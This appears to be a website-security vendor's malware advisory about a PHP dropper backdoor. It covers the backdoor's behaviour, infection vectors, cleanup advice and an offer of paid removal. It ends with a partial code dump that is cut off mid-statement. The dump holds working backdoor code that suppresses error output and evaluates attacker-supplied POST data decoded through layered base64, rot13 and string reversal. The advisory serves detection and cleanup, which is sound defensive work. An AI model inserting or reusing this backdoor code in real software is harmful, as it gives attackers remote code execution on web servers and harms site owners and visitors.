Droppers are specially crafted PHP scripts which payload is to download (drop) a second malicious file and execute it. The dropped file can be a backdoor, hacktool, defacement or spam-seo related malware.
This PHP code act as a remote code execution backdoor accepting PHP commands through POST requests, it also relies on a hosts.txt file to keep the list of the malware sources updated.
When executed, this malware drops a malicous code in the user's computer, acting as a FlashPlayer or Java fake update request.
Affecting
Any vulnerable website. Outdated software or compromised passwords can act as an infection vector.
Cleanup
Cleanup is done by deleting the malicious code inside the file or replacing it with a fresh version. The infection can be found in your system by searching for parts of the dump below inside your site's files and also checking for unknown daemonised perl process.
You can also sign up with us and let our team remove the malware for you.
Dump
@error_reporting(0);
@ini_set("display_errors", 0);
@ini_set("log_errors", 0);
@ini_set("error_log", 0);
if (isset($_GET['r'])) die($_GET['r']);
if (isset($_POST['e']) && !empty($_POST['e']))
{
eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
exit();
}
if (isset($_GET['sid']))
{
$cache = 'link.cache';
$flock = 'link.flock';
$hosts = 'hosts.txt';
if